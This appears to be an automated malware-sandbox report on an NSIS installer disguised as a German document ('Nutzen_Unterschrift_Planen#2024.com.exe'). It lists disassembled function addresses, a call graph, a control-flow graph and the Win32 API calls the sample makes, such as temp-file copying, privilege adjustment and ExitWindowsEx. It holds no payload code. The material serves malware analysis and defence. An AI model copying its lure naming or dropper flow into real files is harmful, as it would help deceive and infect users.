403c43 2344->2537 2347 405c38 18 API calls 2348 403a1a 2347->2348 2349 403aae 2348->2349 2351 40612d 3 API calls 2348->2351 2350 405c38 18 API calls 2349->2350 2352 403ab4 2350->2352 2353 403a4c 2351->2353 2354 403ac4 LoadImageW 2352->2354 2357 406281 17 API calls 2352->2357 2353->2349 2360 403a6d lstrlenW 2353->2360 2364 405b5d CharNextW 2353->2364 2355 403b6a 2354->2355 2356 403aeb RegisterClassW 2354->2356 2359 40140b 2 API calls 2355->2359 2358 403b21 SystemParametersInfoW CreateWindowExW 2356->2358 2389 403b74 2356->2389 2357->2354 2358->2355 2363 403b70 2359->2363 2361 403aa1 2360->2361 2362 403a7b lstrcmpiW 2360->2362 2367 405b30 3 API calls 2361->2367 2362->2361 2366 403a8b GetFileAttributesW 2362->2366 2369 403c43 18 API calls 2363->2369 2363->2389 2365 403a6a 2364->2365 2365->2360 2368 403a97 2366->2368 2370 403aa7 2367->2370 2368->2361 2371 405b7c 2 API calls 2368->2371 2372 403b81 2369->2372 2551 40625f lstrcpynW 2370->2551 2371->2361 2374 403c10 2372->2374 2375 403b8d ShowWindow 2372->2375 2552 405396 OleInitialize 2374->2552 2377 4065c9 3 API calls 2375->2377 2379 403ba5 2377->2379 2378 403c16 2380 403c32 2378->2380 2381 403c1a 2378->2381 2382 403bb3 GetClassInfoW 2379->2382 2386 4065c9 3 API calls 2379->2386 2385 40140b 2 API calls 2380->2385 2388 40140b 2 API calls 2381->2388 2381->2389 2383 403bc7 GetClassInfoW RegisterClassW 2382->2383 2384 403bdd DialogBoxParamW 2382->2384 2383->2384 2387 40140b 2 API calls 2384->2387 2385->2389 2386->2382 2387->2389 2388->2389 2389->2276 2391 406639 5 API calls 2390->2391 2392 4036f2 lstrcatW 2391->2392 2392->2251 2392->2252 2394 4057e3 GetLastError 2393->2394 2395 403734 2393->2395 2394->2395 2396 4057f2 SetFileSecurityW 2394->2396 2395->2265 2396->2395 2397 405808 GetLastError 2396->2397 2397->2395 2398->2223 2574 40625f lstrcpynW 2399->2574 2401 405c49 2575 405bdb CharNextW CharNextW 2401->2575 2404 403693 2404->2276 2413 40625f lstrcpynW 2404->2413 2405 4064f3 5 API calls 2411 405c5f 2405->2411 2406 405c90 lstrlenW 2407 405c9b 2406->2407 2406->2411 2409 405b30 3 API calls 2407->2409 2410 405ca0 GetFileAttributesW 2409->2410 2410->2404 2411->2404 2411->2406 2412 405b7c 2 API calls 2411->2412 2581 4065a2 FindFirstFileW 2411->2581 2412->2406 2413->2256 2414->2263 2416 4038ab 2415->2416 2417 40389d CloseHandle 2415->2417 2584 4038d8 2416->2584 2417->2416 2423 4058d6 2422->2423 2424 4036e5 ExitProcess 2423->2424 2425 4058ea MessageBoxIndirectW 2423->2425 2425->2424 2427 405823 GetLastError 2426->2427 2428 40581f 2426->2428 2427->2428 2428->2265 2429->2266 2430->2278 2438 40628e 2431->2438 2432 4064d9 2433 403795 DeleteFileW 2432->2433 2642 40625f lstrcpynW 2432->2642 2433->2272 2433->2278 2435 4064a7 lstrlenW 2435->2438 2436 406281 10 API calls 2436->2435 2438->2432 2438->2435 2438->2436 2440 4063bc GetSystemDirectoryW 2438->2440 2441 40612d 3 API calls 2438->2441 2442 4063cf GetWindowsDirectoryW 2438->2442 2443 4064f3 5 API calls 2438->2443 2444 406281 10 API calls 2438->2444 2445 40644a lstrcatW 2438->2445 2446 406403 SHGetSpecialFolderLocation 2438->2446 2640 4061a6 wsprintfW 2438->2640 2641 40625f lstrcpynW 2438->2641 2440->2438 2441->2438 2442->2438 2443->2438 2444->2438 2445->2438 2446->2438 2447 40641b SHGetPathFromIDListW CoTaskMemFree 2446->2447 2447->2438 2449 406046 2448->2449 2450 406039 2448->2450 2449->2278 2643 405eab 2450->2643 2453 405883 2452->2453 2454 405877 CloseHandle 2452->2454 2453->2278 2454->2453 2456 401389 2 API calls 2455->2456 2457 401420 2456->2457 2457->2235 2465 406500 2458->2465 2459 406576 2460 40657b CharPrevW 2459->2460 2462 40659c 2459->2462 2460->2459 2461 406569 CharNextW 2461->2459 2461->2465 2462->2299 2463 405b5d CharNextW 2463->2465 2464 406555 CharNextW 2464->2465 2465->2459 2465->2461 2465->2463 2465->2464 2466 406564 CharNextW 2465->2466 2466->2461 2468 40333d 2467->2468 2469 405b4c lstrcatW 2467->2469 2468->2302 2469->2468 2471 405d8d GetTickCount GetTempFileNameW 2470->2471 2472 40334e 2471->2472 2473 405dc3 2471->2473 2472->2213 2473->2471 2473->2472 2474->2308 2475->2310 2477 405b8a 2476->2477 2478 405b90 CharPrevW 2477->2478 2479 402f2d 2477->2479 2478->2477 2478->2479 2480 40625f lstrcpynW 2479->2480 2480->2314 2482 402e66 2481->2482 2483 402e7e 2481->2483 2484 402e76 2482->2484 2485 402e6f DestroyWindow 2482->2485 2486 402e86 2483->2486 2487 402e8e GetTickCount 2483->2487 2484->2317 2485->2484 2517 406675 2486->2517 2489 402e9c CreateDialogParamW ShowWindow 2487->2489 2490 402ebf 2487->2490 2489->2490 2490->2317 2492->2324 2495 403113 2493->2495 2494 403141 2497 4032f2 ReadFile 2494->2497 2495->2494 2534 403308 SetFilePointer 2495->2534 2498 40314c 2497->2498 2499 40328b 2498->2499 2500 40315e GetTickCount 2498->2500 2501 403275 2498->2501 2502 4032cd 2499->2502 2505 40328f 2499->2505 2500->2501 2509 40318a 2500->2509 2501->2331 2504 4032f2 ReadFile 2502->2504 2503 4032f2 ReadFile 2503->2509 2504->2501 2505->2501 2506 4032f2 ReadFile 2505->2506 2507 405e03 WriteFile 2505->2507 2506->2505 2507->2505 2508 4031e0 GetTickCount 2508->2509 2509->2501 2509->2503 2509->2508 2510 403205 MulDiv wsprintfW 2509->2510 2532 405e03 WriteFile 2509->2532 2521 4052c3 2510->2521 2535 405dd4 ReadFile 2513->2535 2516->2323 2518 406692 PeekMessageW 2517->2518 2519 402e8c 2518->2519 2520 406688 DispatchMessageW 2518->2520 2519->2317 2520->2518 2522 4052de 2521->2522 2523 405380 2521->2523 2524 4052fa lstrlenW 2522->2524 2525 406281 17 API calls 2522->2525 2523->2509 2526 405323 2524->2526 2527 405308 lstrlenW 2524->2527 2525->2524 2529 405336 2526->2529 2530 405329 SetWindowTextW 2526->2530 2527->2523 2528 40531a lstrcatW 2527->2528 2528->2526 2529->2523 2531 40533c SendMessageW SendMessageW SendMessageW 2529->2531 2530->2529 2531->2523 2533 405e21 2532->2533 2533->2509 2534->2494 2536 403305 2535->2536 2536->2333 2538 403c57 2537->2538 2559 4061a6 wsprintfW 2538->2559 2540 403cc8 2560 403cfc 2540->2560 2542 4039f8 2542->2347 2543 403ccd 2543->2542 2544 406281 17 API calls 2543->2544 2544->2543 2545->2344 2563 4060cc 2546->2563 2549 406161 RegQueryValueExW RegCloseKey 2550 4039c9 2549->2550 2550->2341 2550->2343 2551->2349 2567 404240 2552->2567 2554 4053e0 2555 404240 SendMessageW 2554->2555 2557 4053f2 OleUninitialize 2555->2557 2556 4053b9 2556->2554 2570 401389 2556->2570 2557->2378 2559->2540 2561 406281 17 API calls 2560->2561 2562 403d0a SetWindowTextW 2561->2562 2562->2543 2564 4060db 2563->2564 2565 4060e4 RegOpenKeyExW 2564->2565 2566 4060df 2564->2566 2565->2566 2566->2549 2566->2550 2568 404258 2567->2568 2569 404249 SendMessageW 2567->2569 2568->2556 2569->2568 2572 401390 2570->2572 2571 4013fe 2571->2556 2572->2571 2573 4013cb MulDiv SendMessageW 2572->2573 2573->2572 2574->2401 2576 405bf8 2575->2576 2579 405c0a 2575->2579 2578 405c05 CharNextW 2576->2578 2576->2579 2577 405c2e 2577->2404 2577->2405 2578->2577 2579->2577 2580 405b5d CharNextW 2579->2580 2580->2579 2582 4065c3 2581->2582 2583 4065b8 FindClose 2581->2583 2582->2411 2583->2582 2585 4038e6 2584->2585 2586 4038eb FreeLibrary GlobalFree 2585->2586 2587 4038b0 2585->2587 2586->2586 2586->2587 2588 40596d 2587->2588 2589 405c38 18 API calls 2588->2589 2590 40598d 2589->2590 2591 405995 DeleteFileW 2590->2591 2592 4059ac 2590->2592 2598 4036c6 OleUninitialize 2591->2598 2593 405acc 2592->2593 2627 40625f lstrcpynW 2592->2627 2593->2598 2599 4065a2 2 API calls 2593->2599 2595 4059d2 2596 4059e5 2595->2596 2597 4059d8 lstrcatW 2595->2597 2601 405b7c 2 API calls 2596->2601 2600 4059eb 2597->2600 2598->2232 2598->2233 2602 405af1 2599->2602 2603 4059fb lstrcatW 2600->2603 2604 405a06 lstrlenW FindFirstFileW 2600->2604 2601->2600 2602->2598 2605 405af5 2602->2605 2603->2604 2604->2593 2612 405a28 2604->2612 2606 405b30 3 API calls 2605->2606 2607 405afb 2606->2607 2609 405925 5 API calls 2607->2609 2608 405aaf FindNextFileW 2608->2612 2613 405ac5 FindClose 2608->2613 2611 405b07 2609->2611 2614 405b21 2611->2614 2615 405b0b 2611->2615 2612->2608 2619 40596d 60 API calls 2612->2619 2621 405a79 2612->2621 2628 40625f lstrcpynW 2612->2628 2613->2593 2617 4052c3 24 API calls 2614->2617 2615->2598 2618 4052c3 24 API calls 2615->2618 2617->2598 2620 405b18 2618->2620 2619->2621 2623 406025 36 API calls 2620->2623 2621->2608 2622 4052c3 24 API calls 2621->2622 2624 4052c3 24 API calls 2621->2624 2626 406025 36 API calls 2621->2626 2629 405925 2621->2629 2622->2608 2625 405b1f 2623->2625 2624->2621 2625->2598 2626->2621 2627->2595 2628->2612 2637 405d2c GetFileAttributesW 2629->2637 2631 405952 2631->2621 2633 405940 RemoveDirectoryW 2635 40594e 2633->2635 2634 405948 DeleteFileW 2634->2635 2635->2631 2636 40595e SetFileAttributesW 2635->2636 2636->2631 2638 405931 2637->2638 2639 405d3e SetFileAttributesW 2637->2639 2638->2631 2638->2633 2638->2634 2639->2638 2640->2438 2641->2438 2642->2433 2644 405f01 GetShortPathNameW 2643->2644 2645 405edb 2643->2645 2646 406020 2644->2646 2647 405f16 2644->2647 2670 405d51 GetFileAttributesW CreateFileW 2645->2670 2646->2449 2647->2646 2650 405f1e wsprintfA 2647->2650 2649 405ee5 CloseHandle GetShortPathNameW 2649->2646 2651 405ef9 2649->2651 2652 406281 17 API calls 2650->2652 2651->2644 2651->2646 2653 405f46 2652->2653 2671 405d51 GetFileAttributesW CreateFileW 2653->2671 2655 405f53 2655->2646 2656 405f62 GetFileSize GlobalAlloc 2655->2656 2657 405f84 2656->2657 2658 406019 CloseHandle 2656->2658 2659 405dd4 ReadFile 2657->2659 2658->2646 2660 405f8c 2659->2660 2660->2658 2672 405cb6 lstrlenA 2660->2672 2663 405fa3 lstrcpyA 2666 405fc5 2663->2666 2664 405fb7 2665 405cb6 4 API calls 2664->2665 2665->2666 2667 405ffc SetFilePointer 2666->2667 2668 405e03 WriteFile 2667->2668 2669 406012 GlobalFree 2668->2669 2669->2658 2670->2649 2671->2655 2673 405cf7 lstrlenA 2672->2673 2674 405cd0 lstrcmpiA 2673->2674 2675 405cff 2673->2675 2674->2675 2676 405cee CharNextA 2674->2676 2675->2663 2675->2664 2676->2673 2954 100016b6 2955 100016e5 2954->2955 2956 10001b18 22 API calls 2955->2956 2957 100016ec 2956->2957 2958 100016f3 2957->2958 2959 100016ff 2957->2959 2960 10001272 2 API calls 2958->2960 2961 10001726 2959->2961 2962 10001709 2959->2962 2965 100016fd 2960->2965 2963 10001750 2961->2963 2964 1000172c 2961->2964 2966 1000153d 3 API calls 2962->2966 2968 1000153d 3 API calls 2963->2968 2967 100015b4 3 API calls 2964->2967 2969 1000170e 2966->2969 2970 10001731 2967->2970 2968->2965 2971 100015b4 3 API calls 2969->2971 2973 10001272 2 API calls 2970->2973 2972 10001714 2971->2972 2974 10001272 2 API calls 2972->2974 2975 10001737 GlobalFree 2973->2975 2976 1000171a GlobalFree 2974->2976 2975->2965 2977 1000174b GlobalFree 2975->2977 2976->2965 2977->2965 2978 10002a77 2979 10002a8f 2978->2979 2980 1000158f 2 API calls 2979->2980 2981 10002aaa 2980->2981 2982 402dd7 2983 402e02 2982->2983 2984 402de9 SetTimer 2982->2984 2985 402e57 2983->2985 2986 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 2983->2986 2984->2983 2986->2985 2987 10002238 2988 10002296 2987->2988 2989 100022cc 2987->2989 2988->2989 2990 100022a8 GlobalAlloc 2988->2990 2990->2988 2991 10001058 2993 10001074 2991->2993 2992 100010dd 2993->2992 2994 10001092 2993->2994 2995 10001516 GlobalFree 2993->2995 2996 10001516 GlobalFree 2994->2996 2995->2994 2997 100010a2 2996->2997 2998 100010b2 2997->2998 2999 100010a9 GlobalSize 2997->2999 3000 100010b6 GlobalAlloc 2998->3000 3001 100010c7 2998->3001 2999->2998 3002 1000153d 3 API calls 3000->3002 3003 100010d2 GlobalFree 3001->3003 3002->3001 3003->2992 2680 10001759 2681 10001789 2680->2681 2722 10001b18 2681->2722 2683 10001790 2684 100018a6 2683->2684 2685 100017a1 2683->2685 2686 100017a8 2683->2686 2770 10002286 2685->2770 2754 100022d0 2686->2754 2691 1000180c 2695 10001812 2691->2695 2696 1000184e 2691->2696 2692 100017ee 2783 100024a4 2692->2783 2693 100017d7 2705 100017cd 2693->2705 2780 10002b57 2693->2780 2694 100017be 2698 100017c4 2694->2698 2704 100017cf 2694->2704 2700 100015b4 3 API calls 2695->2700 2702 100024a4 10 API calls 2696->2702 2698->2705 2764 1000289c 2698->2764 2707 10001828 2700->2707 2713 10001840 2702->2713 2703 100017f4 2794 100015b4 2703->2794 2774 10002640 2704->2774 2705->2691 2705->2692 2710 100024a4 10 API calls 2707->2710 2709 100017d5 2709->2705 2710->2713 2714 10001895 2713->2714 2805 10002467 2713->2805 2714->2684 2716 1000189f GlobalFree 2714->2716 2716->2684 2719 10001881 2719->2714 2809 1000153d wsprintfW 2719->2809 2720 1000187a FreeLibrary 2720->2719 2812 1000121b GlobalAlloc 2722->2812 2724 10001b3c 2813 1000121b GlobalAlloc 2724->2813 2726 10001d7a GlobalFree GlobalFree GlobalFree 2727 10001d97 2726->2727 2745 10001de1 2726->2745 2728 100020ee 2727->2728 2736 10001dac 2727->2736 2727->2745 2730 10002110 GetModuleHandleW 2728->2730 2728->2745 2729 10001c1d GlobalAlloc 2750 10001b47 2729->2750 2731 10002121 LoadLibraryW 2730->2731 2732 10002136 2730->2732 2731->2732 2731->2745 2820 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2732->2820 2733 10001c68 lstrcpyW 2737 10001c72 lstrcpyW 2733->2737 2734 10001c86 GlobalFree 2734->2750 2736->2745 2816 1000122c 2736->2816 2737->2750 2738 10002188 2740 10002195 lstrlenW 2738->2740 2738->2745 2739 10002048 2739->2745 2746 10002090 lstrcpyW 2739->2746 2821 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2740->2821 2742 10002148 2742->2738 2753 10002172 GetProcAddress 2742->2753 2745->2683 2746->2745 2747 10001cc4 2747->2750 2814 1000158f GlobalSize GlobalAlloc 2747->2814 2748 10001f37 GlobalFree 2748->2750 2749 100021af 2749->2745 2750->2726 2750->2729 2750->2733 2750->2734 2750->2737 2750->2739 2750->2745 2750->2747 2750->2748 2752 1000122c 2 API calls 2750->2752 2819 1000121b GlobalAlloc 2750->2819 2752->2750 2753->2738 2755 100022e8 2754->2755 2756 1000122c GlobalAlloc lstrcpynW 2755->2756 2758 10002410 GlobalFree 2755->2758 2759 100023ba GlobalAlloc CLSIDFromString 2755->2759 2760 1000238f GlobalAlloc WideCharToMultiByte 2755->2760 2763 100023d9 2755->2763 2823 100012ba 2755->2823 2756->2755 2758->2755 2761 100017ae 2758->2761 2759->2758 2760->2758 2761->2693 2761->2694 2761->2705 2763->2758 2827 100025d4 2763->2827 2766 100028ae 2764->2766 2765 10002953 EnumWindows 2767 10002971 2765->2767 2766->2765 2768 10002a62 GetLastError 2767->2768 2769 10002a6d 2767->2769 2768->2769 2769->2705 2771 10002296 2770->2771 2773 100017a7 2770->2773 2772 100022a8 GlobalAlloc 2771->2772 2771->2773 2772->2771 2773->2686 2777 1000265c 2774->2777 2775 100026c0 2778 100026c5 GlobalSize 2775->2778 2779 100026cf 2775->2779 2776 100026ad GlobalAlloc 2776->2779 2777->2775 2777->2776 2778->2779 2779->2709 2781 10002b62 2780->2781 2782 10002ba2 GlobalFree 2781->2782 2830 1000121b GlobalAlloc 2783->2830 2785 10002506 MultiByteToWideChar 2790 100024ae 2785->2790 2786 1000252b StringFromGUID2 2786->2790 2787 1000253c lstrcpynW 2787->2790 2788 1000254f wsprintfW 2788->2790 2789 1000256c GlobalFree 2789->2790 2790->2785 2790->2786 2790->2787 2790->2788 2790->2789 2791 100025a7 GlobalFree 2790->2791 2792 10001272 2 API calls 2790->2792 2831 100012e1 2790->2831 2791->2703 2792->2790 2835 1000121b GlobalAlloc 2794->2835 2796 100015ba 2798 100015e1 2796->2798 2799 100015c7 lstrcpyW 2796->2799 2800 100015fb 2798->2800 2801 100015e6 wsprintfW 2798->2801 2799->2800 2802 10001272 2800->2802 2801->2800 2803 100012b5 GlobalFree 2802->2803 2804 1000127b GlobalAlloc lstrcpynW 2802->2804 2803->2713 2804->2803 2806 10002475 2805->2806 2808 10001861 2805->2808 2807 10002491 GlobalFree 2806->2807 2806->2808 2807->2806 2808->2719 2808->2720 2810 10001272 2 API calls 2809->2810 2811 1000155e 2810->2811 2811->2714 2812->2724 2813->2750 2815 100015ad 2814->2815 2815->2747 2822 1000121b GlobalAlloc 2816->2822 2818 1000123b lstrcpynW 2818->2745 2819->2750 2820->2742 2821->2749 2822->2818 2824 100012c1 2823->2824 2825 1000122c 2 API calls 2824->2825 2826 100012df 2825->2826 2826->2755 2828 100025e2 VirtualAlloc 2827->2828 2829 10002638 2827->2829 2828->2829 2829->2763 2830->2790 2832 100012ea 2831->2832 2833 1000130c 2831->2833 2832->2833 2834 100012f0 lstrcpyW 2832->2834 2833->2790 2834->2833 2835->2796 2836 403d1b 2837 403d33 2836->2837 2838 403e6e 2836->2838 2837->2838 2839 403d3f 2837->2839 2840 403ebf 2838->2840 2841 403e7f GetDlgItem GetDlgItem 2838->2841 2843 403d4a SetWindowPos 2839->2843 2844 403d5d 2839->2844 2842 403f19 2840->2842 2853 401389 2 API calls 2840->2853 2845 4041f4 18 API calls 2841->2845 2847 404240 SendMessageW 2842->2847 2867 403e69 2842->2867 2843->2844 2848 403d62 ShowWindow 2844->2848 2849 403d7a 2844->2849 2846 403ea9 SetClassLongW 2845->2846 2850 40140b 2 API calls 2846->2850 2863 403f2b 2847->2863 2848->2849 2851 403d82 DestroyWindow 2849->2851 2852 403d9c 2849->2852 2850->2840 2906 40417d 2851->2906 2854 403da1 SetWindowLongW 2852->2854 2855 403db2 2852->2855 2856 403ef1 2853->2856 2854->2867 2858 403e5b 2855->2858 2859 403dbe GetDlgItem 2855->2859 2856->2842 2860 403ef5 SendMessageW 2856->2860 2857 40417f DestroyWindow EndDialog 2857->2906 2916 40425b 2858->2916 2864 403dd1 SendMessageW IsWindowEnabled 2859->2864 2869 403dee 2859->2869 2860->2867 2861 40140b 2 API calls 2861->2863 2862 4041ae ShowWindow 2862->2867 2863->2857 2863->2861 2866 406281 17 API calls 2863->2866 2863->2867 2872 4041f4 18 API calls 2863->2872 2897 4040bf DestroyWindow 2863->2897 2907 4041f4 2863->2907 2864->2867 2864->2869 2866->2863 2868 403df3 2913 4041cd 2868->2913 2869->2868 2870 403dfb 2869->2870 2873 403e42 SendMessageW 2869->2873 2874 403e0e 2869->2874 2870->2868 2870->2873 2872->2863 2873->2858 2876 403e16 2874->2876 2877 403e2b 2874->2877 2875 403e29 2875->2858 2879 40140b 2 API calls 2876->2879 2878 40140b 2 API calls 2877->2878 2880 403e32 2878->2880 2879->2868 2880->2858 2880->2868 2882 403fa6 GetDlgItem 2883 403fc3 ShowWindow KiUserCallbackDispatcher 2882->2883 2884 403fbb 2882->2884 2910 404216 KiUserCallbackDispatcher 2883->2910 2884->2883 2886 403fed EnableWindow 2891 404001 2886->2891 2887 404006 GetSystemMenu EnableMenuItem SendMessageW 2888 404036 SendMessageW 2887->2888 2887->2891 2888->2891 2890 403cfc 18 API calls 2890->2891 2891->2887 2891->2890 2911 404229 SendMessageW 2891->2911 2912 40625f lstrcpynW 2891->2912 2893 404065 lstrlenW 2894 406281 17 API calls 2893->2894 2895 40407b SetWindowTextW 2894->2895 2896 401389 2 API calls 2895->2896 2896->2863 2898 4040d9 CreateDialogParamW 2897->2898 2897->2906 2899 40410c 2898->2899 2898->2906 2900 4041f4 18 API calls 2899->2900 2901 404117 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2900->2901 2902 401389 2 API calls 2901->2902 2903 40415d 2902->2903 2903->2867 2904 404165 ShowWindow 2903->2904 2905 404240 SendMessageW 2904->2905 2905->2906 2906->2862 2906->2867 2908 406281 17 API calls 2907->2908 2909 4041ff SetDlgItemTextW 2908->2909 2909->2882 2910->2886 2911->2891 2912->2893 2914 4041d4 2913->2914 2915 4041da SendMessageW 2913->2915 2914->2915 2915->2875 2917 404273 GetWindowLongW 2916->2917 2927 4042fc 2916->2927 2918 404284 2917->2918 2917->2927 2919 404293 GetSysColor 2918->2919 2920 404296 2918->2920 2919->2920 2921 4042a6 SetBkMode 2920->2921 2922 40429c SetTextColor 2920->2922 2923 4042c4 2921->2923 2924 4042be GetSysColor 2921->2924 2922->2921 2925 4042d5 2923->2925 2926 4042cb SetBkColor 2923->2926 2924->2923 2925->2927 2928 4042e8 DeleteObject 2925->2928 2929 4042ef CreateBrushIndirect 2925->2929 2926->2925 2927->2867 2928->2929 2929->2927 3010 1000103d 3011 1000101b 5 API calls 3010->3011 3012 10001056 3011->3012

                                                            Executed Functions

                                                            Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 403350-40338d SetErrorMode GetVersion 1 4033a0 0->1 2 40338f-403397 call 406639 0->2 4 4033a5-4033b9 call 4065c9 lstrlenA 1->4 2->1 7 403399 2->7 9 4033bb-4033d7 call 406639 * 3 4->9 7->1 16 4033e8-403449 #17 OleInitialize SHGetFileInfoW call 40625f GetCommandLineW call 40625f GetModuleHandleW 9->16 17 4033d9-4033df 9->17 24 403453-40346d call 405b5d CharNextW 16->24 25 40344b-403452 16->25 17->16 21 4033e1 17->21 21->16 28 403473-403479 24->28 29 403584-40359e GetTempPathW call 40331f 24->29 25->24 31 403482-403486 28->31 32 40347b-403480 28->32 38 4035a0-4035be GetWindowsDirectoryW lstrcatW call 40331f 29->38 39 4035f6-403610 DeleteFileW call 402ec1 29->39 34 403488-40348c 31->34 35 40348d-403491 31->35 32->31 32->32 34->35 36 403550-40355d call 405b5d 35->36 37 403497-40349d 35->37 57 403561-403567 36->57 58 40355f-403560 36->58 40 4034b8-4034f1 37->40 41 40349f-4034a7 37->41 38->39 56 4035c0-4035f0 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40331f 38->56 52 4036c1-4036d1 call 403893 OleUninitialize 39->52 53 403616-40361c 39->53 48 4034f3-4034f8 40->48 49 40350e-403548 40->49 46 4034a9-4034ac 41->46 47 4034ae 41->47 46->40 46->47 47->40 48->49 54 4034fa-403502 48->54 49->36 55 40354a-40354e 49->55 75 4037f7-4037fd 52->75 76 4036d7-4036e7 call 4058c1 ExitProcess 52->76 60 4036b1-4036b8 call 40396d 53->60 61 403622-40362d call 405b5d 53->61 63 403504-403507 54->63 64 403509 54->64 55->36 65 40356f-40357d call 40625f 55->65 56->39 56->52 57->28 59 40356d 57->59 58->57 67 403582 59->67 74 4036bd 60->74 77 40367b-403685 61->77 78 40362f-403664 61->78 63->49 63->64 64->49 65->67 67->29 74->52 80 40387b-403883 75->80 81 4037ff-403815 GetCurrentProcess OpenProcessToken 75->81 85 403687-403695 call 405c38 77->85 86 4036ed-403701 call 40582c lstrcatW 77->86 82 403666-40366a 78->82 83 403885 80->83 84 403889-40388d ExitProcess 80->84 88 403817-403845 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 40384b-403859 call 406639 81->89 91 403673-403677 82->91 92 40366c-403671 82->92 83->84 85->52 101 403697-4036ad call 40625f * 2 85->101 102 403703-403709 lstrcatW 86->102 103 40370e-403728 lstrcatW lstrcmpiW 86->103 88->89 99 403867-403872 ExitWindowsEx 89->99 100 40385b-403865 89->100 91->82 96 403679 91->96 92->91 92->96 96->77 99->80 105 403874-403876 call 40140b 99->105 100->99 100->105 101->60 102->103 103->52 104 40372a-40372d 103->104 108 403736 call 40580f 104->108 109 40372f call 405792 104->109 105->80 117 40373b-403749 SetCurrentDirectoryW 108->117 116 403734 109->116 116->117 118 403756-40377f call 40625f 117->118 119 40374b-403751 call 40625f 117->119 123 403784-4037a0 call 406281 DeleteFileW 118->123 119->118 126 4037e1-4037e9 123->126 127 4037a2-4037b2 CopyFileW 123->127 126->123 129 4037eb-4037f2 call 406025 126->129 127->126 128 4037b4-4037d4 call 406025 call 406281 call 405844 127->128 128->126 138 4037d6-4037dd CloseHandle 128->138 129->52 138->126
                                                            APIs
                                                            • SetErrorMode.KERNELBASE ref: 00403373
                                                            • GetVersion.KERNEL32 ref: 00403379
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
                                                            • OleInitialize.OLE32(00000000), ref: 004033F0
                                                            • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
                                                            • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,?,00000006,00000008,0000000A), ref: 00403434
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000020,?,00000006,00000008,0000000A), ref: 0040345B
                                                              • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                              • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B2
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CE
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB
                                                              • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
                                                            • ExitProcess.KERNEL32 ref: 004036E7
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036FA
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403709
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
                                                            • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037AA
                                                            • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
